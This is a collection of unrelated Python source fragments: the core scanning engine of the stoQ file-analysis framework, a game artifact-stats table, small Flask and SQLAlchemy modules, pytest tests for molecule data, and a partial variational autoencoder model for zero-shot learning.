always_dispatch: Optional[List[str]] = None,
max_queue: Optional[int] = None,
max_recursion: Optional[int] = None,
max_required_worker_depth: Optional[int] = None,
) -> None:
"""
Core Stoq Class
:param base_dir: Base directory for stoQ
:param config_file: stoQ Configuration file
:param log_dir: Path to log directory
:param log_level: Log level for logging events
:param plugin_dir_list: Paths to search for stoQ plugins
:param plugin_opts: Plugin specific options that are passed once a plugin is loaded
:param providers: Provider plugins to be loaded and run for sending payloads to scan
:param source_archivers: Archiver plugins to be used for loading payloads for analysis
:param dest_archiver: Archiver plugins to be used for archiving payloads and extracted payloads
:param connectors: Connectors to be loaded and run for saving results
:param dispatchers: Dispatcher plugins to be used
:param decorators: Decorators to be used
:param always_dispatch: Plugins to always send payloads to, no matter what
:param provider_consumers: Number of provider consumers to instaniate
:param max_queue: Max Queue size for Providers plugins
:param max_recursion: Maximum level of recursion into a payload and extracted payloads
:param max_required_worker_depth: Maximum depth for required worker plugins dependencies
"""
if not base_dir:
base_dir = os.getcwd()
base_dir = os.path.realpath(base_dir)
config_file = config_file or os.path.join(base_dir, 'stoq.cfg')
config = helpers.StoqConfigParser(allow_no_value=True)
if os.path.exists(config_file):
config.read(config_file)
self.max_queue = max_queue or config.getint('core', 'max_queue', fallback=100)
self.provider_consumers = provider_consumers or config.getint(
'core', 'provider_consumers', fallback=2
)
self.max_recursion = max_recursion or config.getint(
'core', 'max_recursion', fallback=10
)
self.max_required_worker_depth = max_required_worker_depth or config.getint(
'core', 'max_required_worker_depth', fallback=10
)
if log_dir is _UNSET:
log_dir = config.get(
'core', 'log_dir', fallback=os.path.join(base_dir, 'logs')
)
log_level = log_level or config.get('core', 'log_level', fallback='INFO')
log_maxbytes = int(config.get('core', 'log_maxbytes', fallback='1500000'))
log_backup_count = int(config.get('core', 'log_backup_count', fallback='5'))
log_syntax = config.get('core', 'log_syntax', fallback='text')
self._init_logger(
log_dir,
log_level, # type: ignore
log_maxbytes,
log_backup_count,
log_syntax,
)
plugin_dir_list = plugin_dir_list or config.getlist(
'core', 'plugin_dir_list', fallback=os.path.join(base_dir, 'plugins')
)
super().__init__(plugin_dir_list, plugin_opts, config)
providers = providers or config.getlist('core', 'providers', fallback=[])
self._loaded_provider_plugins = {
d: self.load_plugin(d) for d in providers if d # type: ignore
}
source_archivers = source_archivers or config.getlist(
'core', 'source_archivers', fallback=[]
)
self._loaded_source_archiver_plugins = {
d: self.load_plugin(d) for d in source_archivers if d # type: ignore
}
dest_archivers = dest_archivers or config.getlist(
'core', 'dest_archivers', fallback=[]
)
self._loaded_dest_archiver_plugins = {
d: self.load_plugin(d) for d in dest_archivers if d # type: ignore
}
connectors = connectors or config.getlist('core', 'connectors', fallback=[])
self._loaded_connector_plugins = [
self.load_plugin(d) for d in connectors if d # type: ignore
]
dispatchers = dispatchers or config.getlist('core', 'dispatchers', fallback=[])
self._loaded_dispatcher_plugins = {
d: self.load_plugin(d) for d in dispatchers if d # type: ignore
}
decorators = decorators or config.getlist('core', 'decorators', fallback=[])
self._loaded_decorator_plugins = {
d: self.load_plugin(d) for d in decorators if d # type: ignore
}
self.always_dispatch = always_dispatch or config.getlist(
'core', 'always_dispatch', fallback=[]
)
if self.always_dispatch:
for ad in self.always_dispatch:
self.load_plugin(ad)
@ratelimited()
async def scan(
self,
content: bytes,
payload_meta: Optional[PayloadMeta] = None,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
ratelimit: Optional[str] = None,
) -> StoqResponse:
"""
Wrapper for `scan_request` that creates a `Payload` object from bytes
:param content: Raw bytes to be scanned
:param payload_meta: Metadata pertaining to originating source
:param request_meta: Metadata pertaining to the originating request
:param add_start_dispatch: Force first round of scanning to use specified plugins
:param ratelimit: Rate limit calls to scan
"""
self.log.debug(
f'Content received ({len(content)} bytes): '
f'PayloadMeta: {helpers.dumps(payload_meta, indent=0)}, '
f'RequestMeta: {helpers.dumps(request_meta, indent=0)}'
)
payload_meta = payload_meta or PayloadMeta()
payload = Payload(content, payload_meta)
request_meta = request_meta or RequestMeta()
request = Request(payloads=[payload], request_meta=request_meta)
return await self.scan_request(request, add_start_dispatch)
async def run(
self,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
) -> None:
"""
Run stoQ using a provider plugin to scan multiple files until exhaustion
:param request_meta: Metadata pertaining to the originating request
:param add_start_dispatch: Force first round of scanning to use specified plugins
"""
# Don't initialize any (provider) plugins here! They should be
# initialized on stoq start-up or via load_plugin()
if not self._loaded_provider_plugins:
raise StoqException('No activated provider plugins')
self.log.debug(
f'Starting provider queue: RequestMeta: {request_meta}, '
f'start_dispatches: {add_start_dispatch}'
)
payload_queue: asyncio.Queue = asyncio.Queue(maxsize=self.max_queue)
providers = [
asyncio.ensure_future(plugin.ingest(payload_queue))
for name, plugin in self._loaded_provider_plugins.items()
]
workers = [
asyncio.ensure_future(
self._consume(payload_queue, request_meta, add_start_dispatch)
)
for n in range(self.provider_consumers)
]
try:
await asyncio.gather(*providers)
await payload_queue.join()
except KeyboardInterrupt:
pass
except Exception as e:
self.log.exception(e, exc_info=True)
finally:
for worker in workers:
worker.cancel()
self.log.debug('Cancelling provider worker')
async def scan_request(
self, request: Request, add_start_dispatch: Optional[List[str]] = None
) -> StoqResponse:
"""
Scan an individual payload
:param request: ``Request`` object of payload(s) to be scanned
:param add_start_dispatch: Force first round of scanning to use specified plugins
"""
self.log.debug(
f'Request received: RequestMeta: {helpers.dumps(request.request_meta, indent=0)}, '
f'start_dispatches: {helpers.dumps(add_start_dispatch, indent=0)}'
)
add_dispatches: Set[Tuple[Payload, str]] = set()
hashes_seen: DefaultDict[str, List] = defaultdict(list)
for idx, payload in enumerate(request.payloads):
if payload.results.payload_meta.should_scan and add_start_dispatch:
for plugin_name in add_start_dispatch:
add_dispatches.add((payload, plugin_name))
sha = helpers.get_sha256(payload.content)
hashes_seen[sha].append(idx)
for _recursion_level in range(1, self.max_recursion + 1):
self.log.debug(f'Beginning worker round {_recursion_level}')
scan_result = await self._execute_scan_round(request, add_dispatches)
if scan_result is None:
self.log.debug('No more plugins to run, completing scan')
break
extracted_payloads, add_dispatches = scan_result
# TODO: Add option for no-dedup
for extracted_payload in extracted_payloads:
payload_hash = helpers.get_sha256(extracted_payload.content)
if payload_hash not in hashes_seen:
self.log.debug(
f'Extracted payload {extracted_payload.results.payload_id} with '
f'PayloadMeta: {extracted_payload.results.payload_meta}'
)
request.payloads.append(extracted_payload)
hashes_seen[payload_hash].append(len(request.payloads) - 1)
payload_meta = extracted_payload.results.payload_meta
if _recursion_level >= self.max_recursion:
request.errors.append(
Error(
error=f'Final worker round ({_recursion_level}) reached, unable to process payload',
payload_id=extracted_payload.results.payload_id,
)
)
elif payload_meta.should_scan and payload_meta.dispatch_to:
add_dispatches.update(
(extracted_payload, add_dispatch)
for add_dispatch in payload_meta.dispatch_to
)
else:
payload_idx = hashes_seen[payload_hash]
for idx in payload_idx:
request.payloads[idx].results.extracted_by.extend(
extracted_payload.results.extracted_by
)
request.payloads[idx].results.extracted_from.extend(
extracted_payload.results.extracted_from
)
archive_tasks: List = []
if request.request_meta.archive_payloads:
for payload in request.payloads:
if not payload.results.payload_meta.should_archive:
continue
for archiver in self._loaded_dest_archiver_plugins.values():
archive_tasks.append(
self._apply_archiver(archiver, payload, request)
)
await asyncio.gather(*archive_tasks)
response = StoqResponse(request=request)
decorator_tasks = []
for decorator in self._loaded_decorator_plugins.values():
decorator_tasks.append(self._apply_decorator(decorator, response))
await asyncio.gather(*decorator_tasks)
connector_tasks = []
for connector in self._loaded_connector_plugins:
connector_tasks.append(self._apply_connector(connector, response))
await asyncio.gather(*connector_tasks)
return response
async def reconstruct_all_subresponses(
self, stoq_response: StoqResponse
) -> AsyncGenerator[StoqResponse, None]:
"""
Generate a new `StoqResponse` object for each `Payload` within
the `Request`
"""
for i, new_root_payload_result in enumerate(stoq_response.results):
parent_payload_ids = {stoq_response.results[i].payload_id}
# Contruct a new root Payload object since StoqResponse only has the
# PayloadResults object
new_root_payload = Payload(b'')
new_root_payload.results = new_root_payload_result
relevant_payloads: List[Payload] = [new_root_payload]
for payload_result in stoq_response.results[i:]:
for extracted_from in payload_result.extracted_from:
if extracted_from in parent_payload_ids:
parent_payload_ids.add(payload_result.payload_id)
new_payload = Payload(b'')
new_payload.results = payload_result
relevant_payloads.append(new_payload)
new_request = Request(
payloads=relevant_payloads, request_meta=stoq_response.request_meta
)
new_response = StoqResponse(
request=new_request,
time=stoq_response.time,
scan_id=stoq_response.scan_id,
)
decorator_tasks = []
for plugin_name, decorator in self._loaded_decorator_plugins.items():
decorator_tasks.append(self._apply_decorator(decorator, new_response))
await asyncio.gather(*decorator_tasks)
yield new_response
async def _execute_scan_round(
self, request: Request, add_dispatches: Set[Tuple[Payload, str]]
) -> Optional[Tuple[List[Payload], Set[Tuple[Payload, str]]]]:
# Form total set of dispatches to run
total_dispatches: Set[Tuple[Payload, str]] = set(add_dispatches)
get_dispatches: List[Awaitable] = [
self._get_dispatches(payload, request)
for payload in request.payloads
if payload.results.payload_meta.should_scan
]
for future in asyncio.as_completed(get_dispatches):
payload, plugins = await future
for plugin in plugins:
total_dispatches.add((payload, plugin))
# Resolve plugin dependencies
can_run, deferred = self._resolve_dependencies(total_dispatches, request)
if not can_run: # Nothing left to do
return None
self.log.debug(
f'Starting scan of {len(can_run)} tasks,'
f' deferring {len(deferred)} to future rounds'
)
# Run plugins
nested_worker_results: List[ # type: ignore
Tuple[Set[Tuple[Payload, str]], List[Payload]]
] = await asyncio.gather(
*[
self._apply_worker(payload, plugin, request)
for payload, plugin in can_run
]
)
extracted_payloads = []
for additional_dispatches, extracted in nested_worker_results:
deferred.update(additional_dispatches)
extracted_payloads.extend(extracted)
return extracted_payloads, deferred
async def _get_dispatches(
self, payload: Payload, request: Request
) -> Tuple[Payload, Set[str]]:
# Run all dispatchers to form our initial set of worker plugins to run
worker_plugins: Set[str] = set(
self.always_dispatch
) if self.always_dispatch else set()
dispatch_results: List[Set[str]] = await asyncio.gather( # type: ignore
*[
self._apply_dispatcher(dispatcher, payload, request)
for dispatcher in self._loaded_dispatcher_plugins.values()
]
)
for dispatch_result in dispatch_results:
worker_plugins.update(dispatch_result)
return payload, worker_plugins
def _resolve_dependencies(
self, total_dispatches: Set[Tuple[Payload, str]], request: Request
) -> Tuple[Set[Tuple[Payload, WorkerPlugin]], Set[Tuple[Payload, str]]]:
# Resolve dependencies for each worker plugin that we want to run
total_can_run: Set[Tuple[Payload, WorkerPlugin]] = set()
total_deferred: Set[Tuple[Payload, str]] = set()
for payload, plugin in total_dispatches:
try:
can_run, deferred = self._resolve_plugin_dependencies(
payload, plugin, request, set()
)
except RuntimeError as e:
self.log.exception(e)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin,
error=helpers.format_exc(e),
)
)
continue
total_can_run.update(can_run)
total_deferred.update(deferred)
return total_can_run, total_deferred
def _resolve_plugin_dependencies(
self,
payload: Payload,
plugin_name: str,
request: Request,
init_plugin_dependency_chain: Set[str],
depth: int = 0,
) -> Tuple[Set[Tuple[Payload, WorkerPlugin]], Set[Tuple[Payload, str]]]:
if plugin_name in init_plugin_dependency_chain:
raise RecursionError(
'Circular required plugin dependency found, '
f'unable to process plugin {plugin_name}'
)
if depth > self.max_required_worker_depth:
raise RecursionError(
f'Max required plugin depth {self.max_required_worker_depth} reached, '
'unable to generate additional tasks'
)
try:
plugin: WorkerPlugin = self.load_plugin(plugin_name) # type: ignore
except Exception as e:
msg = f'Worker plugin {plugin_name} failed to load'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
return set(), set()
if plugin_name in payload.results.plugins_run['workers']:
return set(), set()
can_run: Set[Tuple[Payload, WorkerPlugin]] = set()
deferred: Set[Tuple[Payload, str]] = set()
if self._plugin_can_run(payload, plugin):
can_run.add((payload, plugin))
else:
deferred.add((payload, plugin_name))
if len(plugin.required_workers) != 0:
self.log.debug(
f'{plugin_name} has dependencies of {", ".join(plugin.required_workers)}'
)
plugin_dependency_chain = init_plugin_dependency_chain.copy()
plugin_dependency_chain.add(plugin_name)
for required_plugin in plugin.required_workers:
(
required_plugin_can_run,
required_plugin_deferred,
) = self._resolve_plugin_dependencies(
payload,
required_plugin,
request,
plugin_dependency_chain,
depth + 1,
)
can_run.update(required_plugin_can_run)
deferred.update(required_plugin_deferred)
return can_run, deferred
async def _consume(
self,
payload_queue: asyncio.Queue,
request_meta: Optional[RequestMeta] = None,
add_start_dispatch: Optional[List[str]] = None,
) -> None:
while True:
try:
task = await payload_queue.get()
# Determine whether the provider has returned a `Payload`, or a task.
# If it is a task, load the defined archiver plugin to load the
# `Payload`, otherwise, simply continue on with the scanning.
if isinstance(task, Payload):
request = Request([task], request_meta)
await self.scan_request(request, add_start_dispatch)
else:
for source_archiver, task_meta in task.items():
self.log.debug(
f'Provider task received: source_archiver: {source_archiver}, '
f'task_meta: {task_meta}'
)
try:
ar = ArchiverResponse(task_meta)
payload = await self._loaded_source_archiver_plugins[
source_archiver
].get(ar)
if payload:
request = Request([payload], request_meta)
await self.scan_request(request, add_start_dispatch)
except Exception as e:
self.log.warn(
f'"{task_meta}" failed with archiver "{source_archiver}": {str(e)}'
)
payload_queue.task_done()
except asyncio.QueueEmpty:
pass
def _plugin_can_run(self, payload: Payload, worker_plugin: WorkerPlugin) -> bool:
for required_plugin_name in worker_plugin.required_workers:
if required_plugin_name not in payload.results.plugins_run['workers']:
return False
return True
async def _apply_worker(
self, payload: Payload, plugin: WorkerPlugin, request: Request
) -> Tuple[Set[Tuple[Payload, str]], List[Payload]]:
self.log.debug(
f'Scanning Payload {payload.results.payload_id} with WorkerPlugin {plugin.plugin_name}'
)
try:
worker_response: Optional[WorkerResponse] = await plugin.scan(
payload, request
)
except Exception as e:
worker_response = None
msg = 'worker:failed to scan'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=plugin.plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
payload.results.plugins_run['workers'].append(plugin.plugin_name)
if not worker_response:
return set(), []
if worker_response.results is not None:
payload.results.workers[plugin.plugin_name] = worker_response.results
request.errors.extend(worker_response.errors)
additional_dispatches: Set[Tuple[Payload, str]] = {
(payload, plugin_name) for plugin_name in worker_response.dispatch_to
}
extracted_payloads: List[Payload] = [
Payload(
content=extracted_payload.content,
payload_meta=extracted_payload.payload_meta,
extracted_by=plugin.plugin_name,
extracted_from=payload.results.payload_id,
)
for extracted_payload in worker_response.extracted
]
self.log.debug(
f'Completed scan of {payload.results.payload_id} with WorkerPlugin {plugin.plugin_name} '
f'{len(worker_response.results) if worker_response.results else 0} result keys, ' # type: ignore
f'{len(additional_dispatches)} additional dispatches, and '
f'{len(extracted_payloads)} extracted payloads'
)
return additional_dispatches, extracted_payloads
async def _apply_dispatcher(
self, dispatcher: DispatcherPlugin, payload: Payload, request: Request
) -> Set[str]:
self.log.debug(
f'Sending {payload.results.payload_id} to dispatcher ({dispatcher.plugin_name})'
)
plugin_names: Set[str] = set()
try:
dispatcher_result = await dispatcher.get_dispatches(payload, request)
except Exception as e:
msg = 'dispatcher:failed to dispatch'
self.log.exception(msg)
request.errors.append(
Error(
plugin_name=dispatcher.plugin_name,
error=helpers.format_exc(e, msg=msg),
payload_id=payload.results.payload_id,
)
)
return plugin_names
if dispatcher_result:
if dispatcher_result.plugin_names is not None:
plugin_names.update(dispatcher_result.plugin_names)
self.log.debug(
f'Dispatching {payload.results.payload_id} to {plugin_names}'
)
if dispatcher_result.meta is not None:
payload.dispatch_meta[dispatcher.plugin_name] = dispatcher_result.meta
return plugin_names
async def _apply_archiver(
self, archiver: ArchiverPlugin, payload: Payload, request: Request
) -> None:
archiver_response: Optional[ArchiverResponse] = None
self.log.debug(
f'Archiving {payload.results.payload_id} with {archiver.plugin_name}'
)
try:
archiver_response = await archiver.archive(payload, request)
except Exception as e:
msg = 'archiver:failed to archive'
self.log.exception(msg)
request.errors.append(
Error(
payload_id=payload.results.payload_id,
plugin_name=archiver.plugin_name,
error=helpers.format_exc(e, msg=msg),
)
)
payload.results.plugins_run['archivers'].append(archiver.plugin_name)
if archiver_response:
if archiver_response.errors is not None:
request.errors.extend(archiver_response.errors)
if archiver_response.results is not None:
payload.results.archivers[
archiver.plugin_name
] = archiver_response.results
async def _apply_decorator(
self, decorator: DecoratorPlugin, response: StoqResponse
) -> StoqResponse:
"""Mutates the given StoqResponse object to include decorator information"""
self.log.debug(f'Applying decorator {decorator.plugin_name}')
try:
decorator_response = await decorator.decorate(response)
except Exception as e:
msg = 'decorator'
self.log.exception(msg)
error = Error(
plugin_name=decorator.plugin_name, error=helpers.format_exc(e, msg=msg)
)
response.errors.append(error)
return response
if decorator_response is None:
return response
if decorator_response.results is not None:
response.decorators[decorator.plugin_name] = decorator_response.results
if decorator_response.errors:
response.errors.extend(decorator_response.errors)
return response
async def _apply_connector(
self, connector: ConnectorPlugin, response: StoqResponse
) -> None:
self.log.debug(f'Saving results to connector {connector.plugin_name}')
try:
await connector.save(response)
except Exception as e:
msg = f'Failed to save results using {connector.__module__}'
self.log.exception(msg)
error = Error(
plugin_name=connector.plugin_name, error=helpers.format_exc(e, msg=msg)
)
def _init_logger(
self,
log_dir: Union[object, str],
log_level: str,
log_maxbytes: int,
log_backup_count: int,
log_syntax: str,
) -> None:
self.log = logging.getLogger('stoq')
self.log.setLevel(log_level.upper())
if log_syntax == 'json':
formatter = jsonlogger.JsonFormatter # type: ignore
else:
formatter = logging.Formatter
stderr_handler = logging.StreamHandler()
stderr_logformat = formatter(
'[%(asctime)s %(levelname)s] %(name)s: ' '%(message)s'
)
stderr_handler.setFormatter(stderr_logformat)
self.log.addHandler(stderr_handler)
if log_dir:
# Let's attempt to make the log directory if it doesn't exist
os.makedirs(log_dir, exist_ok=True) # type: ignore
log_path = os.path.abspath(
os.path.join(log_dir, 'stoq.log') # type: ignore
)
file_handler = RotatingFileHandler(
filename=log_path,
mode='a',
maxBytes=log_maxbytes,
backupCount=log_backup_count,
)
file_logformat = formatter(
'%(asctime)s %(levelname)s %(name)s:'
'%(filename)s:%(funcName)s:%(lineno)s: '
'%(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
file_handler.setFormatter(file_logformat)
self.log.addHandler(file_handler)
self.log.debug(f'Writing logs to {log_path}')
|
# (c)2021 wolich
from utils.io import read_data_table
# For now, we simply put the swords data into nested dictionaries.
# We avoid the complexity of an "artifact object".
def initialize_artifacts(unit='kaeya'):
if unit == 'albedo':
artifact_set_bonus = read_data_table('../data/artifacts_albedo.tsv')
# 5 star artifacts at level 20. Will need to modify flat HP and ATK for Defender's and Gambler.
artifact_main_stats = {
'ATK%/GEO/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'ATK%/GEO/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0, 'HP': 4780, 'GDB': 0.466, 'CR': 0.311, 'CD': 0},
'ATK%/GEO/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0.622},
'DEF%/GEO/DEF%': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'DEF%/GEO/ATK%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0},
'DEF%/GEO/CR': {'ATK': 311, 'ATK%': 0, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0.311, 'CD': 0},
'DEF%/GEO/CD': {'ATK': 311, 'ATK%': 0, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0.466, 'CR': 0, 'CD': 0.622},
'DEF%/ATK%/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/ATK%/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'DEF%/ATK%/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
'ATK%/DEF%/DEF%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'ATK%/DEF%/CR': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/DEF%/CD': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 0.583, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
'DEF%/DEF%/DEF%': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.749, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/DEF%/ATK%': {'ATK': 311, 'ATK%': 0.466, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0},
'DEF%/DEF%/CR': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0.311, 'CD': 0},
'DEF%/DEF%/CD': {'ATK': 311, 'ATK%': 0, 'DEF%': 1.166, 'HP': 4780, 'GDB': 0, 'CR': 0, 'CD': 0.622},
}
# Default to Kaeya's artifacts.
else:
artifact_set_bonus = read_data_table('../data/artifacts_kaeya.tsv')
# 5 star artifacts at level 20.
artifact_main_stats = {
'ATK%/PHYS/ATK%': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0, 'CD': 0},
'ATK%/PHYS/CR': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/PHYS/CD': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0.583, 'CDB': 0, 'CR': 0, 'CD': 0.622},
'ATK%/CRYO/ATK%': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0, 'CD': 0},
'ATK%/CRYO/CR': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0.311, 'CD': 0},
'ATK%/CRYO/CD': {'ATK': 311, 'ATK%': 0.466, 'HP': 4780, 'PDB': 0, 'CDB': 0.466, 'CR': 0, 'CD': 0.622},
'ATK%/ATK%/ATK%': {'ATK': 311, 'ATK%': 1.398, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0, 'CD': 0},
'ATK%/ATK%/CR': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0.311, 'CD': 0},
'ATK%/ATK%/CD': {'ATK': 311, 'ATK%': 0.932, 'HP': 4780, 'PDB': 0, 'CDB': 0, 'CR': 0, 'CD': 0.622},
}
return artifact_set_bonus, artifact_main_stats
|
def echo(x):
return "echoing: %s" % x
|
from application import db
from sqlalchemy.sql import text
# Luokkataulu
class Luokka(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), nullable=False)
kilpailut = db.relationship("Kilpailu", backref='luokka', lazy=True)
def __init__(self,name):
self.name = name
def get_id(self):
return self.id
def get_name(self):
return self.name
|
import mol
import pytest
import numpy as np
@pytest.mark.parametrize("molecule, com, natom",
[("water", [9.81833333, 7.60366667, 12.673], 3), ("benzene", [-1.4045, 0, 0], 12)],)
def test_read_xyz(molecule, com, natom):
moldata = mol.data.get_molecule(molecule)
assert np.allclose(np.mean(moldata["geometry"], axis=0), com)
assert len(moldata["geometry"]) == natom
assert len(moldata["symbols"]) == natom
def test_get_molecule_missing():
with pytest.raises(FileNotFoundError):
moldata = mol.data.get_molecule("non-existant")
|
from flask import render_template, request
from app import db
from app.errors import bp
from app.api.errors import error_response as api_error_response
def wants_json_response():
return request.accept_mimetypes['application/json'] >= \
request.accept_mimetypes['text/html']
@bp.app_errorhandler(404)
def not_found_error(error):
if wants_json_response():
return api_error_response(404)
return render_template('errors/404.html'), 404
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
if wants_json_response():
return api_error_response(500)
return render_template('errors/500.html'), 500
|
#vaemodel
import copy
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from torch.utils import data
from data_loader import DATA_LOADER as dataloader
import final_classifier as classifier
import models
class LINEAR_LOGSOFTMAX(nn.Module):
def __init__(self, input_dim, nclass):
super(LINEAR_LOGSOFTMAX, self).__init__()
self.fc = nn.Linear(input_dim,nclass)
self.logic = nn.LogSoftmax(dim=1)
self.lossfunction = nn.NLLLoss()
def forward(self, x):
o = self.logic(self.fc(x))
return o
class Model(nn.Module):
def __init__(self,hyperparameters):
super(Model,self).__init__()
self.device = hyperparameters['device']
self.auxiliary_data_source = hyperparameters['auxiliary_data_source']
self.all_data_sources = ['resnet_features',self.auxiliary_data_source]
self.DATASET = hyperparameters['dataset']
self.num_shots = hyperparameters['num_shots']
self.latent_size = hyperparameters['latent_size']
self.batch_size = hyperparameters['batch_size']
self.hidden_size_rule = hyperparameters['hidden_size_rule']
self.warmup = hyperparameters['model_specifics']['warmup']
self.generalized = hyperparameters['generalized']
self.classifier_batch_size = 32
self.img_seen_samples = hyperparameters['samples_per_class'][self.DATASET][0]
self.att_seen_samples = hyperparameters['samples_per_class'][self.DATASET][1]
self.att_unseen_samples = hyperparameters['samples_per_class'][self.DATASET][2]
self.img_unseen_samples = hyperparameters['samples_per_class'][self.DATASET][3]
self.reco_loss_function = hyperparameters['loss']
self.nepoch = hyperparameters['epochs']
self.lr_cls = hyperparameters['lr_cls']
self.cross_reconstruction = hyperparameters['model_specifics']['cross_reconstruction']
self.cls_train_epochs = hyperparameters['cls_train_steps']
self.dataset = dataloader( self.DATASET, copy.deepcopy(self.auxiliary_data_source) , device= self.device )
if self.DATASET=='CUB':
self.num_classes=200
self.num_novel_classes = 50
elif self.DATASET=='SUN':
self.num_classes=717
self.num_novel_classes = 72
elif self.DATASET=='AWA1' or self.DATASET=='AWA2':
self.num_classes=50
self.num_novel_classes = 10
feature_dimensions = [2048, self.dataset.aux_data.size(1)]
# Here, the encoders and decoders for all modalities are created and put into dict
self.encoder = {}
for datatype, dim in zip(self.all_data_sources,feature_dimensions):
self.encoder[datatype] = models.encoder_template(dim,self.latent_size,self.hidden_size_rule[datatype],self.device)
print(str(datatype) + ' ' + str(dim))
self.decoder = {}
for datatype, dim in zip(self.all_data_sources,feature_dimensions):
self.decoder[datatype] = models.decoder_template(self.latent_size,dim,self.hidden_size_rule[datatype],self.device)
# An optimizer for all encoders and decoders is defined here
parameters_to_optimize = list(self.parameters())
for datatype in self.all_data_sources:
parameters_to_optimize += list(self.encoder[datatype].parameters())
parameters_to_optimize += list(self.decoder[datatype].parameters())
self.optimizer = optim.Adam( parameters_to_optimize ,lr=hyperparameters['lr_gen_model'], betas=(0.9, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)
if self.reco_loss_function=='l2':
self.reconstruction_criterion = nn.MSELoss(size_average=False)
elif self.reco_loss_function=='l1':
self.reconstruction_criterion = nn.L1Loss(size_average=False)
def reparameterize(self, mu, logvar):
if self.reparameterize_with_noise:
sigma = torch.exp(logvar)
eps = torch.cuda.FloatTensor(logvar.size()[0],1).normal_(0,1)
eps = eps.expand(sigma.size())
return mu + sigma*eps
else:
return mu
def forward(self):
pass
def map_label(self,label, classes):
mapped_label = torch.LongTensor(label.size()).to(self.device)
for i in range(classes.size(0)):
mapped_label[label==classes[i]] = i
return mapped_label
def trainstep(self, img, att):
##############################################
# Encode image features and additional
# features
##############################################
mu_img, logvar_img = self.encoder['resnet_features'](img)
z_from_img = self.reparameterize(mu_img, logvar_img)
mu_att, logvar_att = self.encoder[self.auxiliary_data_source](att)
z_from_att = self.reparameterize(mu_att, logvar_att)
##############################################
# Reconstruct inputs
##############################################
img_from_img = self.decoder['resnet_features'](z_from_img)
att_from_att = self.decoder[self.auxiliary_data_source](z_from_att)
reconstruction_loss = self.reconstruction_criterion(img_from_img, img) \
+ self.reconstruction_criterion(att_from_att, att)
##############################################
# Cross Reconstruction Loss
##############################################
img_from_att = self.decoder['resnet_features'](z_from_att)
att_from_img = self.decoder[self.auxiliary_data_source](z_from_img)
cross_reconstruction_loss = self.reconstruction_criterion(img_from_att, img) \
+ self.reconstruction_criterion(att_from_img, att)
##############################################
# KL-Divergence
##############################################
KLD = (0.5 * torch.sum(1 + logvar_att - mu_att.pow(2) - logvar_att.exp())) \
+ (0.5 * torch.sum(1 + logvar_img - mu_img.pow(2) - logvar_img.exp()))
##############################################
# Distribution Alignment
##############################################
distance = torch.sqrt(torch.sum((mu_img - mu_att) ** 2, dim=1) + \
torch.sum((torch.sqrt(logvar_img.exp()) - torch.sqrt(logvar_att.exp())) ** 2, dim=1))
distance = distance.sum()
##############################################
# scale the loss terms according to the warmup
# schedule
##############################################
f1 = 1.0*(self.current_epoch - self.warmup['cross_reconstruction']['start_epoch'] )/(1.0*( self.warmup['cross_reconstruction']['end_epoch']- self.warmup['cross_reconstruction']['start_epoch']))
f1 = f1*(1.0*self.warmup['cross_reconstruction']['factor'])
cross_reconstruction_factor = torch.cuda.FloatTensor([min(max(f1,0),self.warmup['cross_reconstruction']['factor'])])
